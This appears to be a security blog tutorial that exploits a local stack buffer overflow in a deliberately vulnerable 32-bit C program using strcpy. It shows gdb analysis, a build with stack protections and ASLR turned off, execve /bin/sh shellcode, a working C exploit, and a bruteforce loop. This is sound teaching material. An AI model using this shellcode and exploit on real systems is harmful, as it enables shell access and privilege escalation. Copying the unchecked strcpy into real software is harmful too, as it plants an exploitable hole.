Buffer 0verfl0w


Posted on August, 2017

A buffer overflow is a functional bug which happens when a program tries to write outside of an allocated buffer memory. When it happens, some assembly instructions of the program are erased and the functioning of this one became unstable. This kind of bug can be exploited in order to violate the security policy of a system, for instance it can allow one to get a shell and to gain privileges access. In C language, functions like “gets” or “strcpy” get characters from the standard input stream and put it into a buffer. These functions are vulnerable because they do not check if the character string in input matches with the length of the reserved buffer.

Let's explore how a function call works and how we can exploit it!

Here is a vulnerable Code that we will look into.

#include<stdio.h>
#include<string.h>

void vuln(char *buf){

	char buffer[32];
	strcpy(buffer, buf);
}

int main(int argc, char **argv){

	printf("NIOUAH\n");
	vuln(argv[1]);
	printf("No Overflow...\n");

return 0;
}

This code is very simple, first the main function call the vuln function with the argument argv[1]. Then the vuln function copy the argv[1] in a local buffer and then returns. Now we can look with gdb the behaviour of this program.

reglisse@debian:~/Documents/security/BOF$ gdb -q vuln
Reading symbols from vuln...(no debugging symbols found)...done.
(gdb) disas main
Dump of assembler code for function main:
   0x08048445 <+0>:	lea    0x4(%esp),%ecx
   0x08048449 <+4>:	and    $0xfffffff0,%esp
   0x0804844c <+7>:	pushl  -0x4(%ecx)
   0x0804844f <+10>:	push   %ebp
   0x08048450 <+11>:	mov    %esp,%ebp
   0x08048452 <+13>:	push   %ebx
   0x08048453 <+14>:	push   %ecx
   0x08048454 <+15>:	mov    %ecx,%ebx
   0x08048456 <+17>:	sub    $0xc,%esp
   0x08048459 <+20>:	push   $0x8048530
   0x0804845e <+25>:	call   0x8048300 
   0x08048463 <+30>:	add    $0x10,%esp
   0x08048466 <+33>:	mov    0x4(%ebx),%eax
   0x08048469 <+36>:	add    $0x4,%eax
   0x0804846c <+39>:	mov    (%eax),%eax
   0x0804846e <+41>:	sub    $0xc,%esp
   0x08048471 <+44>:	push   %eax
   0x08048472 <+45>:	call   0x804842b 
   0x08048477 <+50>:	add    $0x10,%esp
   0x0804847a <+53>:	sub    $0xc,%esp
   0x0804847d <+56>:	push   $0x8048537
   0x08048482 <+61>:	call   0x8048300 
   0x08048487 <+66>:	add    $0x10,%esp
   0x0804848a <+69>:	mov    $0x0,%eax
   0x0804848f <+74>:	lea    -0x8(%ebp),%esp
   0x08048492 <+77>:	pop    %ecx
   0x08048493 <+78>:	pop    %ebx
   0x08048494 <+79>:	pop    %ebp
   0x08048495 <+80>:	lea    -0x4(%ecx),%esp
---Type  to continue, or q  to quit---
   0x08048498 <+83>:	ret
End of assembler dump.
(gdb)

At main+25 you can see that the puts function is called (printf), then at main+45 the function vuln is called

(gdb) disas vuln
Dump of assembler code for function vuln:
   0x0804842b <+0>:	push   %ebp
   0x0804842c <+1>:	mov    %esp,%ebp
   0x0804842e <+3>:	sub    $0x28,%esp
   0x08048431 <+6>:	sub    $0x8,%esp
   0x08048434 <+9>:	pushl  0x8(%ebp)
   0x08048437 <+12>:	lea    -0x28(%ebp),%eax
   0x0804843a <+15>:	push   %eax
   0x0804843b <+16>:	call   0x80482f0 
   0x08048440 <+21>:	add    $0x10,%esp
   0x08048443 <+24>:	leave
   0x08048444 <+25>:	ret
End of assembler dump.
(gdb)

We can also see in the vuln function that the strcpy function is called. So Let's put a breakpoint at the beginning of the vuln function.

(gdb) set disassembly-flavor intel
(gdb) b *vuln
Breakpoint 1 at 0x804842b
(gdb) r AAAA
Starting program: /home/reglisse/Documents/security/BOF/vuln AAAA
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb)

Now if we explore the stack we can see come values:

(gdb) x/10wx $sp
0xffffd39c:	0x08048477	0xffffd5fb	0xffffd464	0xffffd470
0xffffd3ac:	0xf7e403fd	0xffffd3d0	0xf7fb8000	0x00000000
0xffffd3bc:	0xf7e28a63	0x080484a0

At the top of the stack the address 0x08048477, represents the return address of the vuln function. In fact it is the address of the instruction at main+50 that will be executed after the vuln function.

If we continue the execution we can see that the frame pointer is pushed (saved) on the stack at vuln+0, at main+1 the stack pointer is moved in the frame pointer in order to create a new stack space for the vuln function execution. Then at main+3 and main+6 the stack size is increased for the vuln function execution.

=> 0x0804842b <+0>:	push   ebp
   0x0804842c <+1>:	mov    ebp,esp
   0x0804842e <+3>:	sub    esp,0x28
   0x08048431 <+6>:	sub    esp,0x8
   0x08048434 <+9>:	push   DWORD PTR [ebp+0x8]
   0x08048437 <+12>:	lea    eax,[ebp-0x28]
   0x0804843a <+15>:	push   eax
   0x0804843b <+16>:	call   0x80482f0 
   0x08048440 <+21>:	add    esp,0x10
   0x08048443 <+24>:	leave
   0x08048444 <+25>:	ret  

If we continue the execution after the strcpy function we can see our AAAA value on the stack at address (0xffffd370) which is 0x41414141 in hexadecimal

(gdb) b *vuln+21
Breakpoint 3 at 0x8048440
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) x/10wx $sp
0xffffd360:	0xffffd370	0xffffd5fb	0x00000006	0xf7e73ee4
0xffffd370:	0x41414141	0x00000000	0x00000006	0xf7e0e700
0xffffd380:	0xffffd3b8	0xf7ff0b70
(gdb)

Now what happens if we enter more characters than the buffer can contains ?

(gdb) r AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/reglisse/Documents/security/BOF/vuln AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb)

We can see that the program crash because some "A" characters overwrite a special address in the stack. Here is an image that summarize the state of the stack after a function call.

First there are the function arguments, then the return address and then the old frame pointer. After that the local variables of the function are pushed on the stack (integer, buffer..). Now it is clear that if we enter to much characters in the buffer we will overwrite some values in the stack like frame pointer and return address

So, in order to exploit this program we will redirect the execution flow on a code that is going to execute what we want. In two steps, first we will inject a shellcode (assembly code) in the buffer, overflow it and modify the return address of the vuln function in order to make it point on our shellcode.

Let's practice ! In order to reach the return address of the vuln function we must inject 44 bytes

(gdb) r $(python -c 'print("A"*44 + "B"*4)')
Starting program: /home/reglisse/Documents/security/BOF/vuln $(python -c 'print("A"*44 + "B"*4)')
NIOUAH

Breakpoint 1, 0x0804842b in vuln ()
(gdb) c
Continuing.

Breakpoint 3, 0x08048440 in vuln ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
(gdb)

We can see that the program crash with the 0x42424242 code which is "BBBB", so we must replace "BBBB by the address of our shellcode.

In order to do this exercise we must disable some Linux protections. We will see later how to bypass them. Here is my Makefile

all:
	gcc -m32 -fno-stack-protector -z execstack -o vuln vuln.c
	gcc -m32 -z execstack -o sc shellcode.c
sudo echo '0' > /proc/sys/kernel/randomize_va_space

Let's write the exploit, First we put our shellcode in the environement

reglisse@debian:~/Documents/security$ export SHELLCODE=$(python -c 'print("\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x4a\x45\x54\x45\x48\x41\x43\x4b\x4b\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x66\x90\x90")' )

Then with this code we determine the address where the shellcode is located for the vuln program

#include 
#include <stdlib.h>
#include <string.h>

int main(int argc,char**argv){
        char *ptr;

        if(argc<3){
                printf("Usage: %s <environment var> <target program name>\n", argv[0]);
                exit(0);
        }
        ptr = getenv(argv[1]);
        ptr += (strlen(argv[0]) - strlen(argv[2]))*2;
        printf("%s will be at %p\n",argv[1],ptr);

}
reglisse@debian:~/Documents/security/BOF$ ./deter SHELLCODE vuln
SHELLCODE will be at 0xffffd60a

Let's write the exploit :

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

long getADDR(void) {
  __asm__("mov    %esp,%eax");
}

int main(int argc, char** argv) {

  long esp = getADDR();

  if (argc < 2) {
    printf("Give argument for the bruteforce\n");
    return 1;
  }

  char shellcode[] =
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
    "\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80";
  char buffer[48];
  char* ptr = (char*)& buffer;
  int i;

  for (i = 0; i < 44 - strlen(shellcode); i++, ptr++)
    *ptr = 0x90;
  for (i = 0; i < strlen(shellcode); i++, ptr++)
    *ptr = shellcode[i];

  int offset = atoi(argv[1]);
  long ret = esp - offset;
  *(long*)ptr = ret;

  printf("Inject return address : %p", ret);

  execl("/home/reglisse/Documents/security/BOF/vuln", "vuln", buffer, NULL);
}

This exploit is simple to understand, in fact we put the shellcode into a buffer, we add some NOP instruction which will full the buffer and help jumping in the shellcode. The only point to explain is the getADDR() function. In fact with the virtual address we know that every program starts at the same address in the stack. The getADDR function gets the value of the stack pointer at the begining of the exploit which will be probably the same beginning address for the vuln program. Then we add an offset to this value in order to find the address of the buffer with a quick bruteforce!

Demo

Segmentation fault
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
Floating point exception
NIOUAH
Segmentation fault
NIOUAH
$

Here is the bruteforce script :

#!/bin/sh

V=-1; while [ 1 ]; do A=$((A+1)); ./exploit $A; done

Presentation
Cyril Bresch is graduated from the Grenoble Institute of Technology, Esisar school in computer engineering. He is now a Phd Student within the LCIS lab from Univ. Grenoble Alps and Grenoble Institute of Technology in Valence, France. His research interests are computer security and processor architecture security.

Second place a CSAW 2k16 NYU :)
IEEE publication : "A Red Team Blue Team approach Towards a Secure Processor Design With a Hardware Shadow Stack"

You can contact me at cyril[dot]bresch[dot]fr[at]gmail[dot]com